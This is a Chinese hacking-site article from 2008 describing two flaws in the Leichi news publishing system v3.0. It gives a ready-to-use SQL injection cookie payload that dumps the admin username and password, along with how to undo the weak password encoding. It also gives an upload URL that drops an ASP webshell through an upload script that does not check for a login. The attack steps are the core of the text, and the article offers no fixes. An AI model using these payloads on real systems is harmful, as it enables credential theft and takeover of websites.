通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 网络攻防 >> 文章正文
雷驰新闻发布管理系统v3.0漏洞很简单
责任编辑:酷酷の鱼   更新日期:2008-3-13
 

来源:安全中国

第一个就是得到管理员的密码和用户名。。
在http://127.0.0.1/otype.asp?owen1=文体新闻
加上下面的一段COOKIES。。
owen2=娱乐新闻' and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 1<2 and ''='
(注意要转换一下。。)直接得到管理员的用户名与密码
其密码简单加密了,第一位加1,第二位加2。。第5位加5
如果密码本来是aaaaa的话,那么加密出来就是bcdef
如果加密后的密码是fffff的话,那么原来的密码就是edcba

第二个漏洞,直接得到WEBSHELL
后门有一个上传图片,里面的有一段代码是这样的
actionType = trim(Request.QueryString("actionType"))
picName = trim(Request.QueryString("picName"))
…………
if actionType= "mod" then
remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
else
…………
end if
file.SaveAs Server.mappath(formPath&remFileName)

提交地址改成
/admin/uploadPic.inc.asp?upload_code=ok&editImageNum=1&actionType=mod&picName=123.asp&editRemNum=123123123
就可以直接上传一个马了。。。

第二个漏洞问题很严重,因为uploadPic.inc.asp这个文件竟然没有验证管理员是否登陆。。。。

意思就是说,第一步都可以省略了来搞,汗~~~~

我主要就是想说明的问题就是
这个程序的漏洞太大了,而且利用太简单了而已。。。。

  • 上一篇文章:
  • 下一篇文章:
  • 最近更新
    固顶文章 Delphi编程培训班开课了
    普通文章 万元赏金 寻找动易SiteWeaver CMS/eShop 产品安全漏洞
    普通文章 discuz安全提问算法
    普通文章 Digitize CAPTCHA + 模板制作方法
    普通文章 PHP难吗?PHP脚本注入的简单步骤
    普通文章 雷驰新闻发布管理系统v3.0漏洞很简单
    普通文章 Radmin软件的一次提权技巧
    推荐文章 推荐:Windows Server 2003搭建VPN服务器
    普通文章 Serv-U保存即生效命令
    普通文章 瑞星公司03月13日发布 每日计算机病毒及木马播报
    热门文章
    普通文章Sun:收购MySQL是现代软件史上最重要收购
    普通文章病毒作者创新使用打包技术导致分析成本激增
    普通文章木马--黑客的利器
    普通文章区分正邪两类黑客的四大主要行为
    普通文章安全基础:奥运期间安全防护 之即时通信工具安全
    普通文章真实世界忠告 同样适用于保证网络安全
    推荐文章推荐:教你从原理入手扼杀传播病毒恶意网页
    普通文章公安部:国家信息安全等级保护工作稳步推进
    普通文章“虚拟警察”见效果 有害信息降70%
    普通文章社保查询系统泄露个人信息 该系统已运转八年
    精彩专题